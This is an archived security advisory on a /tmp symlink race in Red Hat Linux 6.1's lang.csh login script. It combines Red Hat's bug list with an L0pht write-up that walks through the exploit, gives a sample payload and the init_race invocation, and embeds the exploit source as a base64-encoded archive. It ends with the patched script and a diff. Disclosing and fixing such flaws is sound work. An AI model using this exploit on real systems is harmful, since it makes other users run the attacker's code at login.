COMMAND
initscripts packages
SYSTEMS AFFECTED
RedHat 6.1
PROBLEM
Following is based Red Hat Security Advisory. One security bug
and several functionality bugs have been fixed in a new release
of initscripts. A /tmp race existed in /etc/profile.d/lang.csh.
Users who had csh/tcsh as their login shell could be vulnerable
to having arbitrary shell code run by their shell on login.
On PPP connections, CHAP authentication did not always work. New
DNS entries were not always correctly added to the
/etc/resolv.conf file. Also, there was a theoretical chance that
random processes could be sent signals by ppp-watch, though no
outside process could affect which processes would be signaled,
and in every known case the signals are sent to impossible process
ids and therefore have no effect. Other various bugs present in
the initscripts that shipped with Red Hat Linux 6.1 are fixed,
including:
- linuxconf-created IP aliases did not work
- linuxconf-created static routes may not work
- path to ipx_interface was incorrect
- /sbin/service did not work
- incompatibility with devfs
- inability to shut down cleanly with quotas
- any user could force 'interactive' startup on next reboot
Following is update by L0pht. The system-wide csh.login
(/etc/csh.login) file tests for the existance of the
/etc/profile.d directory. If the directory exists it sources
each file that exists in the directory that has a '.csh' suffix.
Of these scripts, the lang.csh file tests for the existance of
the /etc/sysconfig/i18n file and, if it exists, creates a shell
script from the file after converting it to csh syntax. This file
is created in the /tmp directory using the process ID as it's
extension. The offending lines of the code are:
sed 's|=C$|=en_US|g' /etc/sysconfig/i18n | sed "s|=| |g" \
| sed "s|^\([^#]\)|setenv \0|g" > /tmp/csh.$$
source /tmp/csh.$$
rm -f /tmp/csh.$$
As one can see, predicting the pid and pre-creating a link needs
a few slight tweaks to work here. If the file linked to does not
have the correct restrictive permissions, the redirection of the
output from the sed(1) command will overwrite the file. If this
happens the only chance for attack here is to replace the file
between the end of the sed(1) line and before the next script
command that sources the target file. This is an extremely small
window to race. If however, the temporary file is pre-created
with a link pointing to a file with restrictive permissions such
as 0444 then the destructive redirection of the output from the
sed(1) command will fail. The next line will source the
pre-created file and the line after that will attempt to remove
it. The only caveat to this is that the user logging in will see
an error message on the attempt to redirect the output into the
pre-created file. However, experience shows that the majority of
users ignore such messages. All of the requirements for this
attack to work are met in the default US full install of RedHat
6.1.
The exploit tools can be found at the following URL:
http://www.l0pht.com/advisories/init.tar.gz
The exploit works as follows. The script to force the user to
execute is specified on the command line. If the script is not
prepped with the correct permissions they are altered. It should
be noted that the full path and filename should be specified here
for the target script. The program watches /etc/csh.login for the
access time to change. Upon seeing the a_time change the /proc
directory is opened and walked looking for processes with the name
of (tcsh). For each entry it sees, a symbolic link is created to
the target script suffixed with the tcsh process ID. The targeted
file is then watched for the a_time to change, which would signify
execution. Upon seeing this the symbolic links that were created
in the /tmp directory are removed. A sample might be to create a
file in /var/tmp such as demo.csh which would contain the
following:
touch /tmp/`/usr/bin/whoami`.$$
And run the program as:
./init_race -f /var/tmp/demo.csh
The user logging in will see the error message
/tmp/csh.## : Permission denied.
Which signifies that we have won the race and a file will be
created in the /tmp directory with the users name and the current
pid. Of course, a malicious user could specify more nefarious
scripts could be used in place of the above benign sample.
Mimed version of exploit source follows:
---
Content-Type: application/octet-stream; name="init.taz"
Content-Transfer-Encoding: base64
Content-Disposition: inline; filename="init.taz"
Content-MD5: 1J7Ot0xcW2Vr8iZYOlEGDQ==
H4sICK6+ZzgAA2luaXQudGFyAOw8a1fbSLL5OvoVHZMJNvgJBjbOkA0BEriHQC6Pk5mTsBxZ
atu9yJJWDxx2yX+/VdUPPWwDmSGZ2XPRSWKpVd1dXVVdry5F+CK5sJPEdi5bT77T1W532xvt
Nvy22xvr3cKvup4AwGpnba293t540u6srHY7T9ja90Iof6VxYkeMPRmn7pDfAnfX+//SS+T4
P7aF33Qefo52p91e73bn8L/T6awo/q+sr6yudAB+tbvSfcLaD4/K9PX/nP8Lwne81OWsQpIQ
2Q5vjiqWJfyEoTxU8caOhk6dOSMg1BLcX306r/3HYox/SXjkq/YgBDoOX0KzfE5jHm0enh0c
ZE0D4XHfHnPTjGPDwAO3ziKe1Fko4E5Aw3vb5QfCv0SgOIlSJ4EfW/5zQs/13P1KneHcHB5t
eDGwL/lJDtDxuO2fhdiE4+3sH7MlV0R7tu96PDcDtHFACN/Jrrl3oR3HE5cthZPsVSrci0TN
fCZcbAqpKbRxIEAqCD/gipyR8NwPEuLt/sEuUOJDFDixQoiII4f5tLK2fg4dgvEYsDsEWn3q
YANSbS/wXB4RxEsLuk1gVM6qVYdtMugK9K9KPiGH6qyS9ga9Sq3Gnm6y3aO3xDBYzkQkzohV
nRqTDTC9HXO2mC721DMsDFgHg2YclVc/4vbly0KvQa6X5u5dPV0+sFMvyU9nD3mV5Kp9XpNg
Xy38iyIyYFXER+Gv6Q+TVEusqQERwglgIOHlONj9qe5U00sOeRQFUbWie/RYpabR419EUu3k
0GAZi2FWPVbjVTi5SCVPDaJPNQ00thFI+KBaCUECgVxxyB0xuCZKgXCwkX3FYT7upAl32ZWw
WWPABp49/OxrfHLY0CwDl8jL/aqeqs6OLo53jg4PfiMoRAOBNlmjU8LCCVLPZX6Q0ADs5/iz
j8MLf9hsNmHKumGhmlyTCcEzEpVRgp0LOA1Qmqu4k58X95/BCuFAFttl2kRB3+Nj2s6Ayjeg
RVPOxwvnBFoUkGnGycU4AG33nJ1c7H88OzmusZsbpkXxduh3xx8Q+n7AR6d7NVZaKqjaIIo4
yiyPxiKOReDHLPCVgLHYiUSYwKoZDASCYkiQE+aBM4KXRGiY5hhWcIO/gBv94rRTYi773CHk
tzCQtZaAy4OIxyOWjDgDRsE2X2ppSjteEHPoWnuZyQON9nHrdHsPNR4MGj+QRIA8mGFLAnGL
PCCLjc5XWwieq5UWzOZUDEpPDZBWkHN2D/Ur4DVj08Bg8+VTWgepvMFuVDX1JsJ3EbUMk7y6
72i8biHwSk5e4oKASs79kredpjkTG7XiZiYvt3ITxQP6wMCDIGJAEjCKRkDwUqizqrGssGow
CaVlkqlC1yCzTXoN0X58mI6z/o1X7oVUfvAOlMP0m5rZfWoFvlqW3GvQUfybB/qxBvby57hF
f0DAcv3M9eH4aBtchzqbgQRJXkYt2k7awqNuJIWtJ65ERUja1Rq6gDNuSsf2B9lrRNMlFJ+T
r5RzFKSUFIcF4jjjsIqoX2y//1CERxuBW6+0WGNw2X+QsRPY7hFnXhBc4l5EDtvo4CTCST3w
W8hXMJzO0RslRi/5eeaegbhMweKUmY0FIcjAUTrBytZmcKTgVOjrK+IMG6+wDEDPWhADcDzY
ycHuzrvdva3373ePy4jg2qpMoJEHNF7C3S+sirfLrNOuYcPyMsvLplmrlq3MTTPylTWhjLWS
cdhy4lHzZxd4KGpl9GGs67EHjm/OvOdGmLtahfomQ+MBy13gXsxLwL8XS6DA1MR3YLmAqm9Q
Jq926peXy8PRFtCvkWNTZJEuNe2l6LJalnW8gBJom8jXniWQ0hOkYWbxcFrBli9pH82Cn+fC
ihl8NMuachK0Ds71z3TwnLnBSfaJ4Hkyz1RTTBma9hycvs5onW6bbkGBmomcDm6ANxNbkCVr
dIA8FNB9PDza2zp8d/Px7PD0eGt7d2cmVkinj/tvd3/dP93dQa+gVptNBiMF7dmLMzI0H6TM
xRnO6t3EKLdMQ8xhTaE5r6tKmppU1mzIvK0ogOWAjMVU6sAqQZCoV1W8W4SZ7X9MITHLrVAD
qXUWJ5P7iub5yow2Pjo7ta4CkB0ZAsosAThWw6GQ7ohqSSLa8PCLcZ9srMEaI2cUVRV8nS22
Fo0fB6DSZsCN1DdGI8pRVC85rnJ4zhCLHvib7FMjxfD+nAIyJSwUiuC4L3NdFO0luLwni7i/
gwGetGPagS/3yYY2ESHucfytDlLPA3FPRsCQf6XAKLcmh0FXlpIzximS5IBHsM91SqnAoEQ9
vBe0QrIPYrOtrBoASHOm9hnpRhG7YgiaQ470SZxnuxC2ZBr5RqfI4Nw0dwgtpfP/7HzW4/Vt
Vz7/m2UAHzYJfHv+t7220d1Q+f/u+kp3HeC73Y2Vx/zvj7i+W/5XytRbUGzldK9O9ZaTuxM7
cUbYQaZxC48rZeAtGv6EMiYSvtyy8ruTvZ6I5T/ZmwdK26pemDvAld0/mfstqdx8UjbjwsOn
ZZ9mg3+3fKcz4s5lnrPVbFLw3so8vzUDVRCoxyTU11vTTagNDmALVJ9nG+Geiajixs3logov
8qFQsUc+I/VXzCDp3fsn5JCyqf94Fqmz9l3zSGM+jnlSSDYsfm4vzko5TKcXvkOqIq83CsmK
EjzI1GlQlvzbuvy1wjgJAgDZvBO+CHp3YnuXoHWTURSkQ5nHh27Ql0yhkwTRtTR8fjDJ+sYB
ZgAnAqKROBQ+HVbQCQASUx1YmOQgqPiYcwTIBrAdh8exTAiD7fOHvMnOQhgGIKnPSMRmioiP
A0DVhtsglz7CGZGHBEhGZAxxfpPtD7ABD1JgYWNb4oA5IHnKkg1AYZVZh0jYiEeUreZXPGoq
OEM8Umi3mpkVI2WzkkbI3XKPvLabGq2g8FRovLP75uxdTnaQfTP08VSmTZLwbRSMp6FZIQGR
T/OjwICptcNGfGknSMHUT8qJ3cHAS+NRlfRrfpfFHudhdVWO4oE5RR5EHEQpGNB9nKQD2hu2
GI4SsFtBmhSHvpvkxRm/gUMG/nZX4H6gxWHn50qUIMy2ofp1ljUqOGJfp7MtcwznNyRc5vr/
+fjvvX3J0Vd76BjjjvhvZaPdkfHf6ur66irWf3Xbncf474dcC0xznZJECR+HDRK3OuvbqFcD
2Lqwj/eCfl8kMfN54tgYGspOTWsBxPwquETlmoxYBV+AzY2T65BXWKOB8nsdpJFuY6Du0X8F
HSd8tEdgdipD7vNIOBUcjMBZGEQJ2pMA9IfsC+4EU3EFxKUeKRZQfYMYwYg5r712OEqa4JuA
Fl1YAG9rd2f37f7h7gk8g0J9u3V2cHoCXkIQx6LvXTNQlFEkXBc0Uv+a/aIwfAX72kmjWICd
ccAU9aBzKMDaDR1HobfossgmzCBA890WEM4NWGMIpABEbSQaaxwhsMv76XAIhgkGyd/vvD3Y
encCfl1j53T35BR+pMI37da2uoNRYajGR8DE+lW/VdcC+wJKlTkYQ8XgIYHuhYVoSku3NLZ+
Pdh/k+uke3miHyOKPkcLbUfXfwe8Gm8o4HFIGOLUD2BY1si1ARHqDGSgydhvwKeJ7Sdkw+vA
SdhK4PY1rZPTrdP9bbZpbW9jOAtke1aVy6lZCwc70AbP2zUYl7BB68yjlzoCJYZiEjIMQT5k
uGhDLBZbua7f1nH/cP/0As8fLo7e/A+SIk2E1wxYlvIIyPdpBpa1dXAAAOYNOF0kTG+O3h0d
NrbRMOweg0D1g2Ea96yfXnNnFDCdOqZ9wXKixD5B0I1lHucVA8vyAOCZsz70hLWkX+pmI9Cc
e1vHO+x06/jd7ukJZmQUSr2fnlWLK6pZ0HSwUwPiSAHCu1/NneQH0Du3YvbZmh4Ge6Gw1CxL
Uqj3E/06CItkv2N8hylwK0fZ3k+5vOK9B8r3sSRvej/R7/3HUOBEy5PfTk5/+4CqgCgNnCNW
NTh02cKA8Vn1vRoDKCOH21xcZNvbm5WCBFeYnGFT7QrLUkx7yCER4+Otw52j95ZF54QweDTG
dIkaegkkFtxcfotlv9+Vt/+SeQ9iVgrXHfa/u7K+oe3/ysZam+p/NzYe7f+PuOblf1tL6gLX
cknl4UDR20k+cpRHRWjSMSBjaYiGDzOcMWs3XlBHeUbE2mhpBrYXg7PewXuwFhAl6klaf8kj
rYwItJShCm3wgE+406UwmCIgQEyyyfUKLwUyBQ76E/nV0qGnrHfBUA3zKNWsbFomhGQtMTV8
EC4hPrcY2fqGylhTSTmrNnZ+ZWw5c6gRm1kTO0U7LT88O/MMA2AmeoABxjHkfGIuAP5oMJI3
6o5xfxByGd17AvMdADcMVNYBIn8X/DmVWqax0rhJPfch2oxc8NTMBAA/CSKJjCq8pMl8zl16
2+cM3Qa4pRGS0QR4DKyGNfrg+4I1x/wHOMoJq7JXDEwNo8LPbrfL4hFlaGkCdHBhBBrkFGeO
IO6FNiVkMQwJE3tAAuHr8nZ5wAF7kpt8RY5+no1BOeZgZKZFyPg6n2MZ2bHKs7gyeUPdL/1g
ggOitwGrKGSByL7g3sXkIo7zrxS8Xe96Sl6nc/HFsv564YBmKVciqHfuwNXHQECCl3/RemZr
uqT5oWpX/3A1c4ZI49XMUmadUrgFslzGPB/yv7iGuVyfOl2+bDbZPylsSR3MjmIMOytxn7tE
MrvyGZ5LOg90wcQYDEYPAd6jbmo2p7bXYw3M/WtgHstMHuqaXf8xetA57vD/O6s6/9fdaK+v
r1H9x9r6o///I64FMfDxvCHLBOxZCzI5V2izTKDwS5y4ImiOXuWbruMWqtxia+pDAO5OQ2Lm
Iy42y0OsYtvA8ROv2BROZgyHZaelVjH07VJXB2ctgVFYUG5zPdHHNkMGcxrAKi2eOHTc6AVD
4VcMiDrYZeokv9BOB4GVagLdahBY5WtMjHrXStCUieShlvCTCtB6oKenDAVowxmRE8VM8Gp+
mGHCCw01z7krOXUa3BxtFBDVb7Mz1MJrXUKkwUpnVTOHMude5bePBYcPcuX1v8yXPfwcd+j/
1fX2itb/G2sI11lda7cf9f+PuKy7EkAqioYQxvbEv7k6jI8T47+2btMIuYNPVHaqKCRrbbzK
4r5CecgsEFkokn9DH5vJkp9C0oGQ3nJd8Hj5GLMFSTAT6TmKKl/4IVWW+ai3AAeecJ0tJeMw
55rn6wYtqsQYyXqvgYigD5XoxQ6sJxKBjCSUr56t81P7HANepIeu9Usi3wmvi2CyKMVQrPBO
19TIVIMqP5PnxOp4mMCJfrpmKh8Z6Je0BlhgLqukNPDY9rzAqarJc+9qWXIJOpbySrLX/DA3
w2qTEV2ztcPj3LUX3iECpSoKHXZ4ge1CmIeQPYrNIZwp9s2VVNCLsoQVRUx+laMKVkzeKsaE
jt4neEDIIPjkqhQC6ZRCLFoWxduMYWkXzZNBlR7dbN8qjjKVBPwJfO9aSaXeJkV5lGtX0iH5
qD5DKsraFLkzgkt4ILki9lTHrH5F6YaSiBeUwp0iXthwY+Hij1pbLBdXln61LiniObH/zovN
y7kuj2aYvs6yJAJJ39FfPv5e6uQ+BEQhrOrgXcuHEpyvMvGVEc+zsX7HV1/x3o8S30yHHEbT
KeOP4PkVdxGNX0gix8ymorBhMJVOme043rGT5m+cTG7KNbkal9685c5Uq0hyVCd/dipjKv63
3SsRB9F1M/mSPNAcd/z/P3joZ/7/p7Uu+IKd9Xb7sf7nh1zzs50HWE3DTrAWRiTX4E1JuZj+
8hYv/ZYdc6rRcdmnceAno5ZrX7euuR2dl7pthaEn5GlKj3xHmTiOG91m92+NDmaUj7m7BzHn
AZ7XU+8TLNcEXHpsi4EjIRwRpDEDf8L2ZMYRjzf0IZAd9UUS2YCSgxlt0BO2T9VEJUSo42QE
/mEwJMNNdUx0MBKPGB4a4W884p4ne2INXhr32Cez5tTHAyYXsPOCkOxoo8GuQMlBbzyPwSOK
Puc+3oiB4O75bCJKwqTJCPqVK5qm4EZJEvZarclk0jRQLbV5BaZXkrFnWUdAsSvBJz3LOoUl
5QjNQtjy9hBrPf3EFn5cZzawbKhKrpKR8LGmiMqsZH2NKsOyiBY0FIUE8kRMjdpkMA15uHIS
/L8DzBcfKdb9UuYET+MspDxApEkwxqoHcKKum/KgTOsguAFPKUY1z/TJCrEHDZN0uCw50yKy
LkZZpXQ7veTjMCABIJ+syT7iShC8L30xNWIdS9xALGx58MXiwEtxSVTahYA+Ql4JFCKIIwKP
jhJdcNd8LGml1SvnT+rRpmXtcIkWSrekvKRdY4LDmAQSq7JiRonVVBqcx0A8eWSJBARbZPsO
t9Q81AmQogo8NyvgppJoWRinS7qpb4ynFnGQRg6QktvOyDLHqwbAL3Wklyi9NltsAoKLLE4H
A/GlyY5ojliTXgmJZ/tDhLt1AZpQFq0AaALCNxDDluj8zZcdgeZ1dH+ExgwisIjbCcmAlDxV
dT4AV9kyR8X2AI9GYTgQeDp5ExT00d69BgH/okSLgOFXDophK42B3xHkFp/GupZcH4ru76AK
ESho+Nmbj+deTclaFB9waKADuD2Ap1qjVDsR78nNjjpxMb7Z3H52s8n9i7OTm+Eim0WGGwKt
AOgNuxlWGPtsNr959Y/P1U//WDj/XLsBp5D7V+xzG0FfMfM9xLNnclZi+lSzrCXKt1pbMe0q
VKExx/KDiLvCSQwdMFomH4w3iHb4wpaHNfLk3GYDPmFW7GGRN0sm3L7MDtux4N5IJ/FAuYgA
4AZc6kgq7Sfx0GeMWEUeIRbwInfeWFcl5pJhuQ0YpEmYStFgxFegFxZCq+9V5IE6ln1OwI5w
g4zCDMRiZIchMFcOhvGRhYfpjqwpUF890McDspAg4qGHxXRmVX0OC+e+KpJxjbwrPEhCiI59
jp8f0EsKA5RQa0Rp9+kdm1UqWBLbU1UoQeYugciRA6YxxtYMK9LlSSNlciwLVjYKJmg5JdWK
ahFHMSxVB6CarVSgISssLFtC0+s5TAH94Ixwk7SxEIL0pjQe0skGaOsOjs1jGNbRkGGxiFRE
Q/kph5RuuU+zRWhFoj8c0dqBiIodLV2/QSykb05Eonczct0BSbTpdVaTYmfVP2jEhqRkfIUI
58QMTHJYYyynHfLctzLZXHL9+ZUDjYPyChSb2Z5mHP8ChBYcBRFPlXPojO1/BuSfAT2lQRVD
HyULuaFRiWFtW1mOQh2nyqjY1MUo6dY7Fi33mCfGMCgf4OzEonNZrHRWaQ/lp603OzDN/xZs
aI/kr2SJwbeJ0SHK6WAWpn3w53BSG3Y3BFsgSqpSHI08MWViX0t1wdQXPHVjnUNy/hBjNXRi
X3IfTJXPdbk3mCuFlNq7cna0Kmk/0/xquTl8SJLQSQI/lFvGO0Slh/qrtDbYHMJVSjPSW9XM
jJSNmTVBtAlfRAVRJYRMjZQqmruyvdSYzPElfmiSbQ0L0UJXB6vybfChAF3fxtQSjgU6jO5Q
TKjcF3fspfTHkKigtq6520TTRAODx4qFH5sb7bYxCxfkkkiTgQmJZzF5vrLshUgvMwxU1BwG
CRYFgieuHTXwgTOyTo3JbA+/39QOytOKSQdinQLlB6w/YjTvbyoNSrfYzZkwRSM6BwRpO01Q
0jT49QJDe4P1kjbuRM+DvQ17pgG0K/p4LeNeUQiS+hAMhWxlnXVWe90XvU6HdV68eGEtLy+z
poFtUgkOxBvUYYc72GGl3Vt70VtZkx1ev2aN1foGW16td7rs9WuLPDda1zSVrYIYbGZi0Phj
Ds63uTWNOX5NY7Zjs4zNrb7wW/cQdAKeI+vL0gd7KHHXw6HE070U+mX58KcI/vJ9JH/5HqKf
0XzeBlAfIhKp/37y28nbo8PTre33itTW7pfQC0SiYicunyj4itUXE7BbIOxmygrKrYNq9+z4
AELz0zf758W+UvPmd9n/tXPtOo0EQTDfrxiJFOHc2SVIZAQnXXBCsGuvOEt4jXZt0P09XdU1
D3Mc8AFdAQHanZ1nd1W7e9gB/qU+c/5lptMcojgFXT2MqUIKsOS80gBHSt49W2O0A6pRSK4a
lBMz586qlBpc+CCLzv7/lw3BSvdPRlnMRKebY84qHWi7x231/jVFir8yKOboFqy8U/ucy17b
3Fcl7HVlJpAVNvd7L8o3j/ZOoebX26RTZMqmlOt7vanzIl97/r6pAXYVC23VHBqbKmRmjhQa
bEM1y+3lg9Jj1q/qiZE9dsAdgkix0Oev7VkoXaSqo+0j+oIYBwrChwOcO0luIwXFw8S0OYe+
hi5829VjTKhKw2b2/O1MQj2ZedJcbuvk3WveNB+iPD5orhtSWHB3hu89iM1/y6a5zdrRLMqY
RitY6oZgfSByscuc/W41gB9p6ffP/OkEGm4Yz3iSj2hKq5d+ZlOZ8CMWAn/jHyZ380EotHR+
RNc5+HU84H3ahofVaZlpMF7/HPr97oFOUgEx29mes1z3Zr+szc/VYiYYI/VqVXqj939+Rtqp
08DaU2btRWwXJ3JxkdbptpxTG+60w8HUk784YF+v3ShqngvVX2Um2Euc0SKkmNlNDF8tVNl2
TvC53yVv1MTmNPMSAFPpjM9szIij1KJv4qQeIfXNpYtZ9hAKamIygj/zwRy722QDclpE0ql1
c6xrgGwabC4eJ22bqw5yebQ+XnbdFSOYXfcukJmwLL95PPn1GrEU/0Vt+Hdim+kuRe5PIBAI
BAKBQCAQCAQCgUAgEAj8H2+4xhNPAHgAAA==
-----
SOLUTION
It is recommended that users of Red Hat Linux 6.1 update to the
fixed packages. RPMs required:
ftp://updates.redhat.com/6.1/i386/initscripts-4.63-1.i386.rpm
ftp://updates.redhat.com/6.1/SRPMS/initscripts-4.63-1.src.rpm
If temporary files must be created in public areas, which is not
the only way to do it here, then proper care must be taken. One
possible solution is to create a subdirectory in the public area
and continue with the needed temporary files residing there. This
solution works when care is taken to check the return value of
the mkdir(1) command and use its atomic nature to ensure that
race tricks are not played.
mkdir --mode=700 /tmp/csh_login.$$
if ($status != 0) then
echo "potential problem -- directory /tmp/csh_login.$$ already exists!"
exit
endif
sed 's|=C$|=en_US|g' /etc/sysconfig/i18n | sed "s|=| |g" | sed "s|^\([^#]\)|setenv \0|g" > /tmp/csh_login.$$/csh.$$
source /tmp/csh_login.$$/csh.$$
rm -f /tmp/csh_login.$$/csh.$$
rmdir /tmp/csh_login.$$
The diff appears as follows:
--- /etc/profile.d/lang.csh Sun Sep 26 13:49:11 1999
+++ ./lang.csh.modified Sun Dec 26 20:59:25 1999
@@ -3,7 +3,14 @@
test -f /etc/sysconfig/i18n
if ($status == 0) then
- sed 's|=C$|=en_US|g' /etc/sysconfig/i18n | sed "s|=| |g" | sed "s|^\([^#]\)|setenv \0|g" > /tmp/csh.$$
- source /tmp/csh.$$
- rm -f /tmp/csh.$$
+ /bin/mkdir --mode=700 /tmp/csh_login.$$
+ if ($status != 0) then
+ echo "potential problem -- directory /tmp/csh_login.$$ already exists!"
+ exit
+ endif
+
+ sed 's|=C$|=en_US|g' /etc/sysconfig/i18n | sed "s|=| |g" | sed "s|^\([^#]\)|setenv \0|g" > /tmp/csh_login.$$/csh.$$
+ source /tmp/csh_login.$$/csh.$$
+ rm -f /tmp/csh_login.$$/csh.$$
+ /bin/rmdir /tmp/csh_login.$$
if ($?SYSFONTACM) then